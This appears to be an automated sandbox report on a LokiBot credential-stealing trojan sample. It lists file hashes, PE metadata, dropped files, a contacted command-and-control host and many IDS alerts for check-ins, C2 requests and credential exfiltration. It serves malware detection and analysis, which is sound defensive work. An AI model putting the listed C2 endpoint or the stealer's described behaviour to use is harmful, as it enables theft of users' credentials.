http://www.fontbureau.comF | 00000000.00000003.259973400.0000000005F88000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000003.259728044.0000000005F87000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cnscr | 00000000.00000003.253038446.0000000005F88000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/M | 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comM | 00000000.00000003.264877441.0000000005F8A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/jp/ | 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn | 00000000.00000003.252891597.0000000005F87000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000003.253123438.0000000005F87000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000003.253038446.0000000005F88000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.comm | 00000000.00000003.264877441.0000000005F8A000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.jiyu-kobo.co.jp/ | 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comrsivb | 00000000.00000003.259973400.0000000005F88000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000003.259728044.0000000005F87000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/i | 00000000.00000003.255439447.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.comituo_ | 00000000.00000003.259973400.0000000005F88000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000003.259728044.0000000005F87000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.jiyu-kobo.co.jp/_ | 00000000.00000003.255574600.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://en.w= | 00000000.00000003.250750964.0000000005F86000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
Contacted IPs map legend:
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

Public IPs:
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.155.55.2 | sempersim.su | United States | | 15169 | GOOGLEUS | false

Private IPs:
IP
192.168.2.1
                                    Joe Sandbox Version:35.0.0 Citrine
                                    Analysis ID:651263
Start date and time: 2022-06-23 18:07:07 +02:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 8m 3s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:hfyhigXccT.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 25
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@5/3@34/2
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HDC Information:
                                    • Successful, ratio: 5.1% (good quality ratio 1.4%)
                                    • Quality average: 13.1%
                                    • Quality standard deviation: 26.8%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 21
                                    • Number of non-executed functions: 14
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.223.24.244
                                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, ocsp.digicert.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Execution Graph export aborted for target hfyhigXccT.exe, PID 6752 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
18:08:18 | API Interceptor | 32x Sleep call for process: hfyhigXccT.exe modified
Context (IPs, domains, ASNs, JA3 fingerprints, dropped files): no context
                                    Process:C:\Users\user\Desktop\hfyhigXccT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1216
                                    Entropy (8bit):5.355304211458859
                                    Encrypted:false
                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                    MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                    SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                    SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                    SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                    Malicious:true
                                    Reputation:high, very likely benign file
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                    Process:C:\Users\user\Desktop\hfyhigXccT.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3:U:U
                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:1
                                    Process:C:\Users\user\Desktop\hfyhigXccT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):46
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:D898504A722BFF1524134C6AB6A5EAA5
                                    SHA1:E0FDC90C2CA2A0219C99D2758E68C18875A3E11E
                                    SHA-256:878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
                                    SHA-512:26A4398BFFB0C0AEF9A6EC53CD3367A2D0ABF2F70097F711BBBF1E9E32FD9F1A72121691BB6A39EEB55D596EDD527934E541B4DEFB3B1426B1D1A6429804DC61
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:..............................................
                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.592985488755628
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:hfyhigXccT.exe
                                    File size:486912
                                    MD5:f0ddd6f32e65868acc9d38b35af0e2c5
                                    SHA1:c0b1cb63866b3b2351a8f68d38e61284c0ed2874
                                    SHA256:748eaf926943f0130b633506282d02f29da4d42d2172b3afce65246633994326
                                    SHA512:d54fc92a0cdebfdcf3ef5fd2df7f885f853224341c053b939a4cc145688a3aad40bc3e2d73dd46f8a9d06c8a055a155478b2eef98e818ee0e534ff598ca71fb3
                                    SSDEEP:12288:NpkPRxliW1CCQo40YdLSs3fJD26kgBS/LsZEgp:fkPRrhLsdLRJD2D+SQZEg
                                    TLSH:11A4E1D4E3984AABD883C3FC587C85002667F74AC5ACC606BCBA3597D5B23DA9193D07
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...]..b..............0..d............... ........@.. ....................................@................................
                                    Icon Hash:00828e8e8686b000
                                    Entrypoint:0x478386
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x62B48A5D [Thu Jun 23 15:44:29 2022 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x78334 | 0x4f | .text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7a000 | 0x42c | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7c000 | 0xc | .reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x2000 | 0x7638c | 0x76400 | False | 0.804710210755814 | data | 7.609356662747534 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc | 0x7a000 | 0x42c | 0x600 | False | 0.2799479166666667 | data | 2.4137483306892307 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc | 0x7c000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    Name | RVA | Size | Type | Language | Country
                                    RT_VERSION | 0x7a058 | 0x3d0 | data | |
                                    DLL | Import
                                    mscoree.dll | _CorExeMain
                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                    06/23/22-18:08:31.463728 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49745 | 104.155.55.2 | 192.168.2.3
                                    06/23/22-18:10:16.412962 | TCP | 2825766 | ETPRO TROJAN LokiBot Checkin M2 | 49896 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:28.518392 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49744 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:36.768062 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49842 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:56.128163 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49773 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:17.520239 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49787 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:36.710116 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 52487 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:08:30.578499 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49745 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:10:03.646769 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49867 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:53.475797 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49772 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:56.029740 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 50778 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:08:35.758181 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49749 | 104.155.55.2 | 192.168.2.3
                                    06/23/22-18:08:53.475797 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49772 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:04.362566 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49777 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:27.695746 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 62547 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:08:45.504366 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49754 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:22.064496 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49807 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:56.128163 | TCP | 2825766 | ETPRO TROJAN LokiBot Checkin M2 | 49773 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:45.504366 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49754 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:08.917855 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49780 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:43.382677 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49751 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:27.755282 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49832 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:11.023804 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49781 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:10:03.646769 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49867 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:10:09.603862 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49892 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:10.958098 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 60640 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:09:08.917855 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49780 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:34.891799 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49749 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:34.891799 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49749 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:10:03.591385 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 64635 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:08:56.994402 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49773 | 104.155.55.2 | 192.168.2.3
                                    06/23/22-18:08:47.827784 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 64452 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:09:00.835939 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49775 | 104.155.55.2 | 192.168.2.3
                                    06/23/22-18:09:05.276468 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49777 | 104.155.55.2 | 192.168.2.3
                                    06/23/22-18:09:55.746969 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49858 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:22.916760 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49807 | 104.155.55.2 | 192.168.2.3
                                    06/23/22-18:08:28.518392 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49744 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:09.874479 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49780 | 104.155.55.2 | 192.168.2.3
                                    06/23/22-18:10:05.859589 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49879 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:30.578499 | TCP | 2825766 | ETPRO TROJAN LokiBot Checkin M2 | 49745 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:34.825260 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 49873 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:08:59.805159 | TCP | 2825766 | ETPRO TROJAN LokiBot Checkin M2 | 49775 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:10:09.542700 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 63083 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:08:41.569598 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49750 | 104.155.55.2 | 192.168.2.3
                                    06/23/22-18:09:59.728406 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49865 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:51.674694 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49771 | 104.155.55.2 | 192.168.2.3
                                    06/23/22-18:08:46.411556 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49754 | 104.155.55.2 | 192.168.2.3
                                    06/23/22-18:09:11.023804 | TCP | 2825766 | ETPRO TROJAN LokiBot Checkin M2 | 49781 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:13.136252 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 63861 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:08:32.826506 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49746 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:55.746969 | TCP | 2825766 | ETPRO TROJAN LokiBot Checkin M2 | 49858 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:50.748195 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49771 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:27.755282 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49832 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:48.152005 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49765 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:10:04.550873 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49867 | 104.155.55.2 | 192.168.2.3
                                    06/23/22-18:08:40.626646 | TCP | 2825766 | ETPRO TROJAN LokiBot Checkin M2 | 49750 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:20.096905 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49795 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:20.096905 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49795 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:43.324751 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 65266 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:08:26.365310 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49743 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:26.293119 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 55923 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:08:32.768385 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 57421 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:10:14.615169 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49895 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:47.565594 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 59065 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:10:14.615169 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49895 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:53.418184 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 52810 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:09:13.286095 | TCP | 2825766 | ETPRO TROJAN LokiBot Checkin M2 | 49783 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:47.624966 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49856 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:08:32.826506 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49746 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:17.520239 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49787 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:02.005884 | UDP | 2014169 | ET DNS Query for .su TLD (Soviet Union) Often Malware Related | 59390 | 53 | 192.168.2.3 | 8.8.8.8
                                    06/23/22-18:09:06.486197 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49778 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:09:59.728406 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49865 | 80 | 192.168.2.3 | 104.155.55.2
                                    06/23/22-18:10:15.552607 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49895 | 104.155.55.2 | 192.168.2.3
                                    06/23/22-18:10:17.418004 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49896 | 104.155.55.2 | 192.168.2.3
                                    06/23/22-18:08:28.518392 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49744 | 80 | 192.168.2.3 | 104.155.55.2
